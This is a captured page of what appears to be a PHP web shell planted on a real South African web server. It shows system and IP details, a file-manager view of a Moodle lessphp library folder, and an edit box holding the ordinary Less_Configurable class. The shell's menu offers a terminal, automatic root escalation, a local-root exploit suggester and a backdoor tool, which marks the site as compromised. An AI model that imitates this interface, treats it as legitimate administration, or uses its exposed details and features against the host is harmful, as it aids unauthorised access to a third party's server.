Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sipdm.cesa.co.za /
lib /
lessphp /
Delete
Unzip
Name
Size
Permission
Date
Action
Exception
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
Output
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
SourceMap
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
Tree
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
Visitor
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
Autoloader.php
1.42
KB
-rw-r--r--
2017-06-22 15:46
Cache.php
7.76
KB
-rw-r--r--
2017-06-22 15:46
Colors.php
4.17
KB
-rw-r--r--
2017-06-22 15:46
Configurable.php
1.19
KB
-rw-r--r--
2017-06-22 15:46
Environment.php
3.29
KB
-rw-r--r--
2017-06-22 15:46
Functions.php
36.9
KB
-rw-r--r--
2017-06-22 15:46
LICENSE
9.5
KB
-rw-r--r--
2017-06-22 15:46
Less.php.combine
226
B
-rw-r--r--
2017-06-22 15:46
Mime.php
1007
B
-rw-r--r--
2017-06-22 15:46
Output.php
749
B
-rw-r--r--
2017-06-22 15:46
Parser.php
59.76
KB
-rw-r--r--
2017-06-22 15:46
Tree.php
1.6
KB
-rw-r--r--
2017-06-22 15:46
Version.php
328
B
-rw-r--r--
2017-06-22 15:46
Visitor.php
850
B
-rw-r--r--
2017-06-22 15:46
VisitorReplacing.php
1.19
KB
-rw-r--r--
2017-06-22 15:46
moodle_readme.txt
333
B
-rw-r--r--
2017-06-22 15:46
Save
Rename
<?php /** * Configurable * * @package Less * @subpackage Core */ abstract class Less_Configurable { /** * Array of options * * @var array */ protected $options = array(); /** * Array of default options * * @var array */ protected $defaultOptions = array(); /** * Set options * * If $options is an object it will be converted into an array by called * it's toArray method. * * @throws Exception * @param array|object $options * */ public function setOptions($options){ $options = array_intersect_key($options,$this->defaultOptions); $this->options = array_merge($this->defaultOptions, $this->options, $options); } /** * Get an option value by name * * If the option is empty or not set a NULL value will be returned. * * @param string $name * @param mixed $default Default value if confiuration of $name is not present * @return mixed */ public function getOption($name, $default = null){ if(isset($this->options[$name])){ return $this->options[$name]; } return $default; } /** * Set an option * * @param string $name * @param mixed $value */ public function setOption($name, $value){ $this->options[$name] = $value; } }